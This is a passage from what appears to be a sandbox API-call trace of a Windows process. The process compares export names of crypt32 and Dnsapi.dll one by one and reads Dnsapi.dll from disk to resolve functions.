lpString2="CertAddCRLContextToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0233.070] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0233.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.071] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0233.072] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0233.072] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0233.073] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0233.073] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0233.073] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0233.073] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0233.073] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0233.073] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0233.073] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0233.073] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0233.633] GetProcessHeap () returned 0x560000 [0233.633] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x4273040 | out: hHeap=0x560000) returned 1 [0233.643] GetProcessHeap () returned 0x560000 [0233.643] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10) returned 0x579330 [0233.644] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0233.856] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0233.856] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0233.857] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0233.857] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0233.858] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0233.858] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0233.858] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0233.858] GetProcessHeap () returned 0x560000 [0233.858] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xa7b88) returned 0x3aed010 [0233.860] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0233.860] ReadFile (in: hFile=0x17c, lpBuffer=0x3aed010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3aed010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0233.872] CloseHandle (hObject=0x17c) returned 1 [0233.872] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0233.872] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.872] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0233.873] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.873] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.873] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0233.873] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.873] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.873] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0233.873] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0233.873] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.873] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.873] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0233.873] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0233.873] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0233.873] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.873] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.873] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0233.873] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0233.873] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.873] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0233.873] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.873] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.873] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0233.873] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0233.874] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.874] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0233.874] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0233.874] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.874] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.874] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0233.874] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0233.874] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.874] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0233.874] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0233.874] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0233.874] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.874] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.874] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0233.874] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0233.874] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.874] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0233.874] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0233.874] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0233.874] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0233.874] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.875] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.875] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0233.875] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0233.875] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.875] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0233.875] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0233.875] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0233.875] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.875] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0233.875] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.875] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.875] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0233.875] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0233.875] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.875] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0233.875] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0233.875] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0233.875] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.875] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.875] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0233.875] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.875] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.875] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0233.875] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0233.875] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.875] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0233.875] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0233.875] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0233.876] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0233.876] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0233.877] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.877] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0233.878] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0233.879] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0233.879] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0233.880] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0233.880] lstrcmpA 